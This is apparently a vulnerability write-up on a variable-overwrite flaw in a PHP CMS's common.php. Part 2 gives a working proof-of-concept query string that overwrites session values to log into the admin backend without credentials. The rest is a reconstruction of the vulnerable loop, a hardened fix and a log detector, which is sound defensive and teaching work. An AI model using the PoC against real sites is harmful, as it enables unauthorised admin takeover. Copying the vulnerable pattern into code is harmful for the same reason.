1. Cause of the vulnerability
The vulnerability is at line 52 of /domiphp/common.php.
The code at that line iterates over the user's GET, POST and COOKIE parameters and registers each parameter name as a variable name with the parameter value as its value. Because the parameter name itself is never checked, this allows a variable overwrite vulnerability (the function on the right only escapes double and single quotes in the value).
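To make the mechanism concrete, here is an added illustration (not duomi's own common.php and not the author's code). The vulnerable loop is an assumed reconstruction of the behaviour described above: every request key becomes a variable name at file scope and only the value is escaped, with addslashes() standing in for the quote-escaping helper. The hardened read_params() function is an allowlist replacement added for contrast. The request array is constructed with parse_str() so it has the same shape PHP would give $_GET.

```php
<?php
// Added illustration for this write-up; it is not duomi's own common.php.
// Assumed shape of the vulnerable logic: every request key becomes a variable,
// only the value is escaped. Below it, an allowlist-based replacement. Run from the CLI.

// Constructed stand-in for the $_GET array PHP would build for the query
//   ?page=2&is_admin=1&_SESSION[duomi_admin_id]=1
// parse_str() applies PHP's own bracket parsing, so the array shape matches.
parse_str('page=2&is_admin=1&_SESSION[duomi_admin_id]=1', $fake_get);

$is_admin = false;                     // server-side state, must not be client-controlled
$_SESSION = ['duomi_admin_id' => 0];   // stand-in session; no session_start() needed for the demo

// --- Vulnerable pattern (assumed shape, see above) -------------------------
// At file scope "$$k" resolves in the global symbol table, so a key named
// "_SESSION" targets the superglobal itself. addslashes() stands in for the
// quote-escaping helper mentioned in the write-up; it touches the value only.
foreach ($fake_get as $k => $v) {
    $$k = is_array($v) ? array_map('addslashes', $v) : addslashes($v);
}
echo "after vulnerable loop:\n";
var_dump($is_admin);                   // now holds the string taken from the URL
var_dump($_SESSION['duomi_admin_id']); // now holds the string taken from the URL

// --- Hardened pattern (added here, not the project's own fix) --------------
// Read only an explicit allowlist of names, never register anything globally,
// and hand the values back for the caller to bind to variables it chooses.
function read_params(array $source, array $allowed): array
{
    $out = [];
    foreach ($allowed as $name) {
        if (array_key_exists($name, $source) && is_scalar($source[$name])) {
            $out[$name] = (string) $source[$name];
        }
    }
    return $out;
}

$is_admin = false;
$_SESSION = ['duomi_admin_id' => 0];
$params = read_params($fake_get, ['page']);  // is_admin and _SESSION are simply ignored
echo "after hardened read:\n";
var_dump($params);
var_dump($is_admin);
var_dump($_SESSION['duomi_admin_id']);
```

In the first half both the local flag and the session array are replaced by whatever the query string carried; in the second half only the allowlisted page value comes back and the server-side state is untouched. The point of the fix is that parameter names are never used as variable names at all, so there is nothing left for a crafted key to collide with.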
2. Exploiting the vulnerability
Try to set a custom session.
First, insert a debug output to view the administrator session.
Find pages that include the vulnerable file, for example:
/interface/comment.php
Construct poc:
?_SESSION[duomi_ckstr]=jcfe&_SESSION[duomi_admin_id]=1&_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_name]=admin
After visiting it, the backend login succeeds.
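From the detection side, requests of the shape shown above are easy to spot in web server logs because the parameter name itself is a PHP superglobal. The following is an added helper written for this write-up (not part of duomi or the original post); it uses PHP's own parse_str() decoding so that an encoded "_SESSION%5B...%5D" key surfaces as "_SESSION", and scans a few constructed combined-format log lines.

```php
<?php
// Added detection helper for this write-up; it is not part of duomi or of the
// original post. It flags requests whose query-string parameter names would
// land on a PHP superglobal under a register-globals-style loop.

const SUPERGLOBAL_NAMES = [
    'GLOBALS', '_SERVER', '_GET', '_POST', '_FILES',
    '_COOKIE', '_SESSION', '_REQUEST', '_ENV',
];

// Top-level parameter names in a raw query string that collide with a
// superglobal. parse_str() applies the same decoding and bracket parsing PHP
// uses for real requests, so "_SESSION%5Bx%5D=1" surfaces as key "_SESSION".
function superglobal_params(string $query): array
{
    parse_str($query, $parsed);
    return array_values(array_intersect(array_keys($parsed), SUPERGLOBAL_NAMES));
}

// Scan access-log lines (combined format) and return the suspicious ones as
// [line index => ['path' => ..., 'names' => [...]]].
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // The quoted request field: "METHOD /path?query HTTP/x.y"
        if (!preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"#', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY);
        if (!is_string($query) || $query === '') {
            continue;
        }
        $names = superglobal_params($query);
        if ($names !== []) {
            $hits[$i] = ['path' => parse_url($m[1], PHP_URL_PATH), 'names' => $names];
        }
    }
    return $hits;
}

// Constructed sample lines (addresses from the 203.0.113.0/24 documentation range).
$sample = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /interface/comment.php?id=12 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /interface/comment.php?_SESSION%5Bduomi_admin_id%5D=1&_SESSION%5Bduomi_group_id%5D=1 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=2&_GET%5Bx%5D=1 HTTP/1.1" 200 1024',
];

foreach (scan_access_log($sample) as $i => $hit) {
    printf("line %d: %s sets %s\n", $i, $hit['path'], implode(', ', $hit['names']));
}
```

Only the second and third sample lines are reported, the first carries an ordinary id parameter. The same check belongs in a WAF rule or in the application itself: a request that names a superglobal as a parameter has no legitimate purpose and can be rejected before common.php ever sees it.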